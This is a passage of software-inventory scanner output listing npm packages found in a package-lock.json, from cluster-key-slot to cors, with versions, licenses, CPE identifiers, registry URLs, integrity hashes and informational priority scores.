*id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 03115b0621f3a47e ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: cluster-key-slot 1.1.2' title: cluster-key-slot 1.1.2 description: 'Package discovered: cluster-key-slot 1.1.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 635dabdd9cdc8fd8 name: cluster-key-slot version: 1.1.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: Apache-2.0 spdxExpression: Apache-2.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:cluster-key-slot:cluster-key-slot:1.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:cluster-key-slot:cluster_key_slot:1.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:cluster_key_slot:cluster-key-slot:1.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:cluster_key_slot:cluster_key_slot:1.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:cluster-key:cluster-key-slot:1.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:cluster-key:cluster_key_slot:1.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:cluster_key:cluster-key-slot:1.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:cluster_key:cluster_key_slot:1.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:cluster:cluster-key-slot:1.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:cluster:cluster_key_slot:1.1.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/cluster-key-slot@1.1.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/cluster-key-slot/-/cluster-key-slot-1.1.2.tgz integrity: sha512-RMr0FhtfXemyinomL4hrWcYJxmX6deFdCxpJzhDttxgO1+bcCnkk+9drydLVDmAMG7NE6aN/fl4F7ucU/90gAA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 56e4289efb51aa13 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: color-convert 2.0.1' title: color-convert 2.0.1 description: 'Package discovered: color-convert 2.0.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: fcc3d45495abf3bd name: color-convert version: 2.0.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:color-convert:color-convert:2.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:color-convert:color_convert:2.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:color_convert:color-convert:2.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:color_convert:color_convert:2.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:color:color-convert:2.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:color:color_convert:2.0.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/color-convert@2.0.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz integrity: sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ== dependencies: color-name: ~1.1.4 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 568b6e4207edec50 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: color-name 1.1.4' title: color-name 1.1.4 description: 'Package discovered: color-name 1.1.4' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 9d8d6c4ccfd91cbf name: color-name version: 1.1.4 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:color-name:color-name:1.1.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:color-name:color_name:1.1.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:color_name:color-name:1.1.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:color_name:color_name:1.1.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:color:color-name:1.1.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:color:color_name:1.1.4:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/color-name@1.1.4 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz integrity: sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: c5d023023358f691 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: color-name 2.1.0' title: color-name 2.1.0 description: 'Package discovered: color-name 2.1.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 8dfa4f08fc1899a7 name: color-name version: 2.1.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:color-name:color-name:2.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:color-name:color_name:2.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:color_name:color-name:2.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:color_name:color_name:2.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:color:color-name:2.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:color:color_name:2.1.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/color-name@2.1.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/color-name/-/color-name-2.1.0.tgz integrity: sha512-1bPaDNFm0axzE4MEAzKPuqKWeRaT43U/hyxKPBdqTfmPF+d6n7FSoTFxLVULUJOmiLp01KjhIPPH+HrXZJN4Rg== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: d0d3f9cc2cfd641a ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: color-string 1.9.1' title: color-string 1.9.1 description: 'Package discovered: color-string 1.9.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: b96884f4eed4192d name: color-string version: 1.9.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:color-string_project:color-string:1.9.1:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/color-string@1.9.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/color-string/-/color-string-1.9.1.tgz integrity: sha512-shrVawQFojnZv6xM40anx4CkoDP+fZsw/ZerEMsW/pyzsRbElpsL/DBVW7q3ExxwusdNXI3lXpuhEZkzs8p5Eg== dependencies: color-name: ^1.0.0 simple-swizzle: ^0.2.2 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: b8edaba313b178d2 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: color-string 2.1.4' title: color-string 2.1.4 description: 'Package discovered: color-string 2.1.4' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 1f15e4f4433605fc name: color-string version: 2.1.4 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:color-string_project:color-string:2.1.4:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/color-string@2.1.4 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/color-string/-/color-string-2.1.4.tgz integrity: sha512-Bb6Cq8oq0IjDOe8wJmi4JeNn763Xs9cfrBcaylK1tPypWzyoy2G3l90v9k64kjphl/ZJjPIShFztenRomi8WTg== dependencies: color-name: ^2.0.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 227fe4ddfe5bcfb2 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: combined-stream 1.0.8' title: combined-stream 1.0.8 description: 'Package discovered: combined-stream 1.0.8' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 6feb2abce081a13b name: combined-stream version: 1.0.8 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:combined-stream:combined-stream:1.0.8:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:combined-stream:combined_stream:1.0.8:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:combined_stream:combined-stream:1.0.8:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:combined_stream:combined_stream:1.0.8:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:combined:combined-stream:1.0.8:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:combined:combined_stream:1.0.8:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/combined-stream@1.0.8 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz integrity: sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg== dependencies: delayed-stream: ~1.0.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: df1825804c4b40ea ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: commander 10.0.1' title: commander 10.0.1 description: 'Package discovered: commander 10.0.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 68cb0d0425b8ec71 name: commander version: 10.0.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:commander:commander:10.0.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/commander@10.0.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/commander/-/commander-10.0.1.tgz integrity: sha512-y4Mg2tXshplEbSGzx7amzPwKKOCGuoSRP/CjEdwwk0FOGlUbq6lKuoyDZTNZkmxHdJtp54hdfY/JUrdL7Xfdug== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: b275a043135b9b63 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: commander 4.1.1' title: commander 4.1.1 description: 'Package discovered: commander 4.1.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 6ef23c8bf6c64c11 name: commander version: 4.1.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:commander:commander:4.1.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/commander@4.1.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/commander/-/commander-4.1.1.tgz integrity: sha512-NOKm8xhkzAjzFx8B2v5OAHT+u5pRQc2UCa2Vq9jYL/31o2wi9mxBA7LIFs3sV5VSC49z6pEhfbMULvShKj26WA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: af21f9856150d16c ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: concat-stream 1.6.2' title: concat-stream 1.6.2 description: 'Package discovered: concat-stream 1.6.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: ee26fc9f2aa2694f name: concat-stream version: 1.6.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:concat-stream:concat-stream:1.6.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:concat-stream:concat_stream:1.6.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:concat_stream:concat-stream:1.6.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:concat_stream:concat_stream:1.6.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:concat:concat-stream:1.6.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:concat:concat_stream:1.6.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/concat-stream@1.6.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/concat-stream/-/concat-stream-1.6.2.tgz integrity: sha512-27HBghJxjiZtIk3Ycvn/4kbJk/1uZuJFfuPEns6LaEvpvG1f0hTea8lilrouyo9mVc2GWdcEZ8OLoGmSADlrCw== dependencies: buffer-from: ^1.0.0 inherits: ^2.0.3 readable-stream: ^2.2.2 typedarray: ^0.0.6 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 6a853859517f2ba3 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: config-chain 1.1.13' title: config-chain 1.1.13 description: 'Package discovered: config-chain 1.1.13' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: f8adcbfce494f378 name: config-chain version: 1.1.13 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:config-chain:config-chain:1.1.13:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:config-chain:config_chain:1.1.13:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:config_chain:config-chain:1.1.13:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:config_chain:config_chain:1.1.13:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:config:config-chain:1.1.13:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:config:config_chain:1.1.13:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/config-chain@1.1.13 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/config-chain/-/config-chain-1.1.13.tgz integrity: sha512-qj+f8APARXHrM0hraqXYb2/bOVSV4PvJQlNZ/DVj0QrmNM2q2euizkeuVckQ57J+W0mRH6Hvi+k50M4Jul2VRQ== dependencies: ini: ^1.3.4 proto-list: ~1.2.1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: aa020ae4ab2eadc3 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: content-disposition 0.5.4' title: content-disposition 0.5.4 description: 'Package discovered: content-disposition 0.5.4' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 5a8a76bf321e2afc name: content-disposition version: 0.5.4 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:content-disposition:content-disposition:0.5.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:content-disposition:content_disposition:0.5.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:content_disposition:content-disposition:0.5.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:content_disposition:content_disposition:0.5.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:content:content-disposition:0.5.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:content:content_disposition:0.5.4:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/content-disposition@0.5.4 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/content-disposition/-/content-disposition-0.5.4.tgz integrity: sha512-FveZTNuGw04cxlAiWbzi6zTAL/lhehaWbTtgluJh4/E95DqMwTmha3KZN1aAWA8cFIhHzMZUvLevkw5Rqk+tSQ== dependencies: safe-buffer: 5.2.1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 9a45820ffdb99ef9 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: content-type 1.0.5' title: content-type 1.0.5 description: 'Package discovered: content-type 1.0.5' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: e6774efb67a1cd80 name: content-type version: 1.0.5 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:content-type:content-type:1.0.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:content-type:content_type:1.0.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:content_type:content-type:1.0.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:content_type:content_type:1.0.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:content:content-type:1.0.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:content:content_type:1.0.5:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/content-type@1.0.5 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/content-type/-/content-type-1.0.5.tgz integrity: sha512-nTjqfcBFEipKdXCv4YDQWCfmcLZKm81ldF0pAopTvyrFGVbcR6P/VAAd5G7N+0tTr8QqiU0tFadD6FK4NtJwOA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 475f89190adc46cd ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: cookie 0.7.2' title: cookie 0.7.2 description: 'Package discovered: cookie 0.7.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: dabea341270367ac name: cookie version: 0.7.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:cookie:cookie:0.7.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/cookie@0.7.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/cookie/-/cookie-0.7.2.tgz integrity: sha512-yki5XnKuf750l50uGTllt6kKILY4nQ1eNIQatoXEByZ5dWgnKqbnqmTrBE5B4N7lrMJKQ2ytWMiTO2o0v6Ew/w== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 980ccdca1420305a ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: cookie-signature 1.0.7' title: cookie-signature 1.0.7 description: 'Package discovered: cookie-signature 1.0.7' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: c3cdc836e23cbee4 name: cookie-signature version: 1.0.7 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:cookie-signature_project:cookie-signature:1.0.7:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/cookie-signature@1.0.7 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/cookie-signature/-/cookie-signature-1.0.7.tgz integrity: sha512-NXdYc3dLr47pBkpUCHtKSwIOQXLVn8dZEuywboCOJY/osA0wFSLlSawr3KN8qXJEyX66FcONTH8EIlVuK0yyFA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 8ea7108a43fc0ad4 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: core-util-is 1.0.3' title: core-util-is 1.0.3 description: 'Package discovered: core-util-is 1.0.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 9bfb1fb9a1cd315e name: core-util-is version: 1.0.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:core-util-is:core-util-is:1.0.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:core-util-is:core_util_is:1.0.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:core_util_is:core-util-is:1.0.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:core_util_is:core_util_is:1.0.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:core-util:core-util-is:1.0.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:core-util:core_util_is:1.0.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:core_util:core-util-is:1.0.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:core_util:core_util_is:1.0.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:core:core-util-is:1.0.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:core:core_util_is:1.0.3:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/core-util-is@1.0.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.3.tgz integrity: sha512-ZQBvi1DcpJ4GDqanjucZ2Hj3wEO5pZDS89BWbkcrvdxksJorwUDDZamX9ldFkp9aw2lmBDLgkObEA4DWNJ9FYQ== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 171e24f79e6f61b0 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: cors 2.8.6' title: cors 2.8.6 description: 'Package discovered: cors 2.8.6' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: c8f0caa18c740c23 name: cors version: 2.8.6 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: 